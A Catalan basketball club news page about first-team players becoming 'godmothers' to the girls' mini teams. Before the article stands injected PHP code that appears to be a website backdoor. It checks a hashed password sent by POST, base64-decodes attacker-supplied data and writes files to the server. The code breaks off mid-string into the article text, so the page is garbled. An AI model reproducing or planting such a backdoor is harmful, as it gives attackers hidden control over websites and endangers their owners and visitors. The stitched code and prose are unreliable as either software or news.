function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Jugadores del sènior A, padrines dels equips de mini femenins - Tgn Bàsquet Club -

Jugadores del sènior A, padrines dels equips de mini femenins

By
Updated: desembre 10, 2014

El TGN Bàsquet ha volgut unir els dos extrems del club i fer un lligam més fort entre els esportistes de l’entitat. Set jugadores del primer equip del TGN Bàsquet han cedit el seu nom i el seu dorsal als equips mini femenins del club. L’entitat volia desterrar, d’aquesta manera, el fet d’haver de diferenciar equips de la mateixa categoria amb colors (blau, blanc…) o bé amb lletres (A, B…). “De vegades posar una lletra a l’equip pot fer pensar que un equip és millor que l’altre, com passa en el cas de les lletres A, B o C. Aquesta és una manera simpàtica de diferenciar els conjunts i de vincular-los al primer equip”, explica la capitana del Nemser TGN Bàsquet i membre de la junta Montse Martí.

Així, els equips que han adoptat les inicials de les jugadores del sènior A són: aleví femení 6è I12 (Irene Villegas), aleví femení 6è M15 (Montse Martí), aleví femení 5è G4 (Gina Fort), aleví femení 5è A7 (Anais Muñoz),  benjamí femení 4art L9 (Laura Vilamajor), benjamí femení 3er O6 (Ona Fort) i escola femenina de 2n (Sagrat Cor L13, Laura Martínez, que n’és l’entrenadora). “Volem que les més petites ens tinguin com a referents i desitgin algun dia poder arribar al primer equip. Volem que ens vinguin a veure als partits també. Nosaltres, com a padrines, intentem anar als seus partits i als entrenaments i estar amb contacte amb elles, fer el seguiment de l’equip”, explica Martí.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *